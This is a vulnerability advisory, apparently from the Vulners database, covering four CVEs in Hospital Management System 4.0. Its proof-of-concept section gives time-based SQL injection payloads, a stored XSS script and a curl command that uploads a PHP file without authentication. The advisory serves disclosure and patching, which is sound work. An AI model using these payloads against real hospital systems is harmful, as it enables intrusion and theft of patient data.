Vulners
Lucene search
Hospital Management System 4.0 XSS / Shell Upload / SQL Injection Vulnerabilities
| Reporter | Title | Published | Views | Family All 44 |
|---|---|---|---|---|
 | CVE-2020-26627 | 10 Jan 202410:26 | – | circl |
| CVE-2020-26628 | 10 Jan 202410:26 | – | circl |
| CVE-2020-26629 | 10 Jan 202410:26 | – | circl |
| CVE-2020-26630 | 10 Jan 202410:26 | – | circl |
 | Hospital Management System SQL Injection Vulnerability | 24 Dec 202300:00 | – | cnnvd |
| Hospital Management System 跨站脚本漏洞 | 10 Jan 202400:00 | – | cnnvd |
| Hospital Management System 安全漏洞 | 10 Jan 202400:00 | – | cnnvd |
| Hospital Management System SQL注入漏洞 | 10 Jan 202400:00 | – | cnnvd |
 | Hospital Management System SQL Injection Vulnerability | 12 Jan 202400:00 | – | cnvd |
| Hospital Management System Cross-Site Scripting Vulnerability (CNVD-2024-06175) | 12 Jan 202400:00 | – | cnvd |
10
Description: Mutiple vulnerabilties were discovered in Hospital Management System
Affected CMS: Hospital Management System
Affected Version: <= 4.0
CVE ID: CVE-2020-26627, CVE-2020-26628, CVE-2020-26629, CVE-2020-26630
CVSS Score: 7.2 (High)
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
Discoverers: Chris Chan @ UDomain Web Hosting Co.Ltd, Louise Ng @ UDomain Web Hosting Co.Ltd
Multiple vulnerabilities were discovered in Hospital Management System v4.0 and before which allows a remote attacker to execute arbitary web scripts.
Proof of Concept:
Attack Vector 1 (Time-Based SQL injection):
Step 1.) Login admin
Step 2.) Go to Conatctus Queries -> unread query -> type something in admin remark (e.g test) and submit
Step 3.) Replace the POST body to below payload and server will respond after 5 second.
adminremark='/**/AND/**/(SELECT/**/1/**/FROM/**/(SELECT(SLEEP(5)))CXde)/**/AND/**/'a'='a&update=
Attack Vector 2 (Time-Based SQL injection):
Step 1.) Login admin
Step 2.) Go to Doctors -> Doctor Specialization -> Click Submit
Step 3.) Replace the POST body to below payload and server will respond after 5 second.
doctorspecilization='/**/AND/**/(SELECT/**/1/**/FROM/**/(SELECT(SLEEP(5)))CXde)/**/AND/**/'a'='a&submit=
Attack Vector 3 (Cross Site Scripting (XSS)):
After attacker login, attacker can append malicious javascript behind their name. Other people will trigger xss when they visit this user.
Step 1.) Login patient page
Step 2.) Got to My Profile>Edit Profile.
Step 3.) Append <ScRiPt >alert("poc")</ScRiPt> behind username and save
Step 4.) Other user visit this profile will trigger xss
Attacker Vector 4 (Unauthenticated Arbitrary File Upload):
The HMS is using a vulnerable jquery file upload. Attacker can upload any file to server and trigger it.
Step 1.) upload file with below curl command:
curl -i -s -k -X $'POST' \
-H $'Content-Type: multipart/form-data; boundary=a211583f728c46a09ca726497e0a5a9f' -H $'Host: localhost' -H $'Content-Length: 164' \
--data-binary $'--a211583f728c46a09ca726497e0a5a9f\x0d\x0aContent-Disposition: form-data; name=\"files[]\"; filename=\"info.php\"\x0d\x0a\x0d\x0a<?php phpinfo(); ?>\x0d\x0a--a211583f728c46a09ca726497e0a5a9f--' \
$'http://localhost/hsm/hms/admin/vendor/jquery-file-upload//server/php/index.php'
Step 2.) visit the url in response and trigger the php file.
Recommendation
Update to v5.2.0
https://phpgurukul.com/contact-us/
https://phpgurukul.com/hospital-management-system-in-php
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
22 Dec 2023 00:00Current
8.1High risk
Vulners AI Score8.1
CVSS 3.19.8
EPSS0.00973